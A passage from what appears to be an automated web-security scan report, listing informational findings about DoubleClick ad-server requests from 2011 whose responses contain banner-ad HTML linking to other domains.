GET /adi/N553.158901.DATAXU/B4970757.16;sz=728x90;pc=[TPAS_ID];ord=NERCNDQwMDMwMDA1QTE4NTBBRTU3Nzk1MjEwQTZFOEN8R0ZmOHpVb1hiV3wxMzAzNjU4NTAxNDIyfDF8MEY2WXJBQmRPUHwwUkV5b1BSTVN6fEVYXzEwMjM0NzcyMDZ8MzMxNjU1? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0REyoPRMSz_696710848.html?rtbhost=rts-rr17.sldc.dataxu.net&btid=NERCNDQwMDMwMDA1QTE4NTBBRTU3Nzk1MjEwQTZFOEN8R0ZmOHpVb1hiV3wxMzAzNjU4NTAxNDIyfDF8MEY2WXJBQmRPUHwwUkV5b1BSTVN6fEVYXzEwMjM0NzcyMDZ8MzMxNjU1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAAwAFoYUK5XeVIQpujIjD7cILBOkoQIpRdg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY2WXJBQmRPUA&ciu=MFJFeW9QUk1Teg&reqid=NERCNDQwMDMwMDA1QTE4NTBBRTU3Nzk1MjEwQTZFOEM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=331&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 15:21:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5736

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
f3/3/0/%2a/l%3B239296400%3B2-0%3B0%3B57848023%3B3454-728/90%3B41418991/41436778/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://personalsavings.americanexpress.com/savings-product.html"><img src="http://s0.2mdn.net/2179194/2-HYSA_RL_728x90_20k.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a></noscript>

<!-- start DV tag-->
<script type='text/javascript' language='javascript' src='http://cdn.doubleverify.com/script26.js?agnc=422775&cmp=4970757&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=57848023&advid=2179194&sid=973580&adid='></script>
...[SNIP]...
<noscript><img style="margin:0;padding:0;" border="0" width="1" height="1" src="http://l.betrad.com/ct/0_0_0_0_0_1153/pixel.gif?e=100&v=noscript"/></noscript>
...[SNIP]...

23.27. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B5114832.6  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.158901.DATAXU/B5114832.6

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N553.158901.DATAXU/B5114832.6;sz=728x90;pc=[TPAS_ID];ord=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEJ8R0Z4SVo3ZkJBZHwxMzAzNjU4NDAyNTg0fDF8MEYzTllTc2l3d3wwUmtQUXJRUkZ5fEVYXzEwMjM0NzcyMDZ8MTM4OTYy? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RkPQrQRFy_1341446950.html?rtbhost=rts-rr11.sldc.dataxu.net&btid=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEJ8R0Z4SVo3ZkJBZHwxMzAzNjU4NDAyNTg0fDF8MEYzTllTc2l3d3wwUmtQUXJRUkZ5fEVYXzEwMjM0NzcyMDZ8MTM4OTYy&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_oAAIeAsK5X6IMLFNiw5YQb_V37aYux-2HA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEYzTllTc2l3dw&ciu=MFJrUFFyUVJGeQ&reqid=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=138&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 2522
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 24 Apr 2011 15:20:02 GMT
Expires: Sun, 24 Apr 2011 15:20:02 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 4,228 Template Name = HTML Image Banner + Optional Additio
...[SNIP]...
1-0%3B0%3B62154145%3B3454-728/90%3B41537449/41555236/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://www201.americanexpress.com/cards/Applyfservlet?csi=78/40514/b/311" target="_blank">
<img src="http://s0.2mdn.net/1297440/PRG_Reward60_728x90_40k.gif" border="0" alt=""/></a>
...[SNIP]...
</script>


<script type='text/javascript' language='javascript' src='http://cdn.doubleverify.com/script26.js?agnc=422775&cmp=5114832&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=62154145&advid=1297440&sid=973580&adid='></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-54O-h3cYFO1Zc.gif?media=ad&labels=_imp.adserver.doubleclick,_imp.publisher.62154145,_imp.placement.234084063,_imp.creative.41537449" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...
<noscript><img style="margin:0;padding:0;" border="0" width="1" height="1" src="http://l.betrad.com/ct/0_0_0_0_0_79/pixel.gif?e=100&v=noscript"/></noscript>
...[SNIP]...

23.28. http://ad.doubleclick.net/adi/N5762.158901.DATAXU/B4799014.12  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5762.158901.DATAXU/B4799014.12

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N5762.158901.DATAXU/B4799014.12;sz=160x600;ord=NERCNDUwOEMwMDBENkZGQzBBRUM2NjEzQkFGRjcwRUV8R0ZIMlV3cUxBSnwxMzAzNjYyNzM0OTIyfDF8MEZZWG9GdFhPUXwwUlppZUREZUdJfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDIwNTc3MQ? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RZieDDeGI_308736425.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NERCNDUwOEMwMDBENkZGQzBBRUM2NjEzQkFGRjcwRUV8R0ZIMlV3cUxBSnwxMzAzNjYyNzM0OTIyfDF8MEZZWG9GdFhPUXwwUlppZUREZUdJfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDIwNTc3MQ&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRQjAANb_wK7GYTuv9w7qr-ELGqjb86HRtR-A&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZZWG9GdFhPUQ&ciu=MFJaaWVERGVHSQ&reqid=NERCNDUwOEMwMDBENkZGQzBBRUM2NjEzQkFGRjcwRUU&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=205&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5325
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 24 Apr 2011 16:32:14 GMT
Expires: Sun, 24 Apr 2011 16:32:14 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed Sep 08 10:39:48 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
k" href="http://ad.doubleclick.net/click%3Bh%3Dv8/3af3/3/0/%2a/g%3B234415609%3B1-0%3B0%3B53099530%3B2321-160/600%3B38300374/38318131/1%3B%3B%7Esscs%3D%3fhttp://www.onepassplus.com/?CELL=633N&tagid=go"><img src="http://s0.2mdn.net/2901682/Even Faster 1_160x600.jpg" width="160" height="600" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

23.29. http://ad.doubleclick.net/adi/N6648.150834.TURN/B5275279.6  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6648.150834.TURN/B5275279.6

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/N6648.150834.TURN/B5275279.6;sz=728x90;ord=3204984562765078005?;click=http://r.turn.com/r/tpclick/id/9R05pnpkeiwPdg4A_gEBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBipcRZEC0Tdu1C-rtlQfyuemHAsCshNAB-KLb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEJNzI4eDkwX2FzyAEJ2gFIaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl83MjhfOTBfYi5waHA_c2VhcmNoPSU3QiRrZXl3b3JkJTdEmAJkwAIEyALsk-kJqAMB6AO8AegDlAL1AwAAAMSABuHh9obM1uH8Ww%26num%3D1%26sig%3DAGiWqtyMckh3wZa7xNgeCD_9yTTL6zDYkw%26client%3Dca-pub-6888065668292638%26adurl%3D/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676599&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658599151&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303658599159&frm=1&adk=513358139&ga_vid=955713783.1303658599&ga_sid=1303658599&ga_hid=1255304632&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 15:30:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1036

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/
...[SNIP]...
IEyALsk-kJqAMB6AO8AegDlAL1AwAAAMSABuHh9obM1uH8Ww%26num%3D1%26sig%3DAGiWqtyMckh3wZa7xNgeCD_9yTTL6zDYkw%26client%3Dca-pub-6888065668292638%26adurl%3D/url/http%3a%2f%2fwww.super8.com/Super8/control/home"><img src="http://s0.2mdn.net/viewad/3087097/S8_728x90_Spring_Promo_WORKING_FILE.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

23.30. http://ad.doubleclick.net/adi/pcw.main.news/topics/consumer_advice/article  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/pcw.main.news/topics/consumer_advice/article

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/pcw.main.news/topics/consumer_advice/article;pg=article;aid=149142;c=2206;c=1746;c=2210;pos=336showcase;tile=2;sz=336x280;ord=02880823?;c=win7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 19:44:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 632

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script type="text/javascript" language="javascript">
var fd_c
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://adsfac.us/ag.asp?cc=DLK001.311878.0&source=js&ord=[timestamp]"></script>
<noscript>
<a href="http://adsfac.us/link.asp?cc=DLK001.311878.0" target="_blank"><img src="http://adsfac.us/ag.asp?cc=DLK001.311878.0&bk=1&ord=[timestamp]" width="336" height="280" border="0" alt=""></a>
...[SNIP]...

23.31. http://ad.doubleclick.net/adi/pcw.main.news/topics/consumer_advice/article  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/pcw.main.news/topics/consumer_advice/article

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/pcw.main.news/topics/consumer_advice/article;pg=article;aid=149142;c=2206;c=1746;c=2210;pos=728leader;tile=1;sz=728x90;ord=02880823?;c=win7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 19:48:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6181

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
<!-- Code auto-generated on Fri Apr 15 14:40:07 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
83772%3B3454-728/90%3B41478209/41495996/1%3B%3B%7Eaopt%3D2/1/64/0%3B%7Esscs%3D%3fhttp://shop.lenovo.com/us/landing_pages/promos/thinkpad/ThinkPad-sale?cid=us|disp|badg|pcworld|display_dr|8890&dfaid=1"><img src="http://s0.2mdn.net/1847082/AG_T520_728x90.gif" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

23.32. http://ad.doubleclick.net/adi/pcw.main.news/topics/consumer_advice/article  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/pcw.main.news/topics/consumer_advice/article

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/pcw.main.news/topics/consumer_advice/article;pg=article;aid=149142;c=2206;c=1746;c=2210;pos=2-336showcase;tile=9;sz=336x280;ord=02880823?;c=win7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 19:44:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1009

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2419013&PluID=0&w=300&h=250&ord=4783842&ifrm=1&ucm=true&ifl=$$http://www.pcworld.com/eyeblaster/addineyeV2.html$$&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3af3/3/0/%2a/s%3B237554731%3B0-0%3B0%3B28183772%3B4252-336/280%3B41666872/41684659/1%3B%3B%7Eaopt%3D2/1/64/0%3B%7Esscs%3D%3f$$"></script>
...[SNIP]...
80%3B41666872/41684659/1%3B%3B%7Eaopt%3D2/1/64/0%3B%7Esscs%3D%3fhttp%3A//bs.serving-sys.com/BurstingPipe/adServer.bs%3Fcn%3Dbrd%26FlightID%3D2419013%26Page%3D%26PluID%3D0%26Pos%3D2973" target="_blank"><img src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=bsr&FlightID=2419013&Page=&PluID=0&Pos=2973" border=0 width=300 height=250></a>
...[SNIP]...

23.33. http://ad.doubleclick.net/adj/N4270.158901.DATAXU/B5279322.4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4270.158901.DATAXU/B5279322.4

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/N4270.158901.DATAXU/B5279322.4;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMkQwMDA4RkExMDBBRTU3QjQ5MThBQjA3QkF8R0ZUaHhEMEVMQnwxMzAzNjU4NTQzNjM0fDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8MzgxNTk5? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RDMd2Pp56_1855871382.html?rtbhost=rts-rr12.sldc.dataxu.net&btid=NERCNDQwMkQwMDA4RkExMDBBRTU3QjQ5MThBQjA3QkF8R0ZUaHhEMEVMQnwxMzAzNjU4NTQzNjM0fDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8MzgxNTk5&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRALQAI-hAK5XtJGKsHuhilbCHDocZSZdL3wA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY5OXBpbjNiag&ciu=MFJETWQyUHA1Ng&reqid=NERCNDQwMkQwMDA4RkExMDBBRTU3QjQ5MThBQjA3QkE&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=381&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 24 Apr 2011 15:22:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 391

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af3/0/0/%2a/g;239653009;0-0;0;60600888;2321-160/600;41547488/41565275/2;;~okv=;pc=[TPAS_ID];;~sscs=%3fhttp://success.adobe.com/en/na/sem/products/creativesuite/design.html?kw=p&sdid=IFBFN"><img src="http://s0.2mdn.net/viewad/1295336/1-Adobe_CS5-5_DesignPrem_160x600_img.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

23.34. http://ad.doubleclick.net/adj/N4270.158901.DATAXU/B5279322.4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4270.158901.DATAXU/B5279322.4

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/N4270.158901.DATAXU/B5279322.4;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwODgwMDBEQTZGNTBBRTU4MEM5MjI4NzI3ODB8R0Z5UmlTRzhGNHwxMzAzNjU4NjM0OTIyfDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8MzgwNjEx? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RDMd2Pp56_1855871382.html?rtbhost=rts-rr16.sldc.dataxu.net&btid=NERCNDQwODgwMDBEQTZGNTBBRTU4MEM5MjI4NzI3ODB8R0Z5UmlTRzhGNHwxMzAzNjU4NjM0OTIyfDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8MzgwNjEx&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAiAANpvUK5YDJIocngE1dSdpWpJDKZEirOQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY5OXBpbjNiag&ciu=MFJETWQyUHA1Ng&reqid=NERCNDQwODgwMDBEQTZGNTBBRTU4MEM5MjI4NzI3ODA&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=380&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 24 Apr 2011 15:23:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 382

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af3/0/0/%2a/n;239653009;1-0;0;60600888;2321-160/600;41547693/41565480/2;;~okv=;pc=[TPAS_ID];;~sscs=%3fhttp://success.adobe.com/en/na/sem/products/creativesuite/family.html?sdid=IFBFN"><img src="http://s0.2mdn.net/viewad/1295336/1-Adobe_CS5-5_Family_160x600_img.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

23.35. http://ad.doubleclick.net/adj/N4610.Dogtime/B5083466.8  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4610.Dogtime/B5083466.8

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/N4610.Dogtime/B5083466.8;sz=300x250;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=903895%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=11%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=11%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bo%3D20%3By%3D64%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord=0.5279946007646981? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=c51bf923600009b||t=1303663573|et=730|cs=jppc_u-3

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 53717
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 24 Apr 2011 16:47:56 GMT
Expires: Sun, 24 Apr 2011 16:47:56 GMT
Discarded: true

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
,809001050%3Bg=172%3Bi=11%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=11%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bo%3D20%3By%3D64%3Bv%3D1%3Bt%3Dr%3Bk%3Dhttp://www.cesar.com/default.aspx?slide=bath2011"><IMG id="IMG_'+ variableName +'" SRC="http://s0.2mdn.net/1508486/PID_1574877_300x250.jpg" width="300" height="250" BORDER=0 alt=""/></A>
...[SNIP]...

23.36. http://ad.doubleclick.net/adj/inet.hostcat/_default  previous  next

Summary

Severity:   Information
Confidence:   Certain
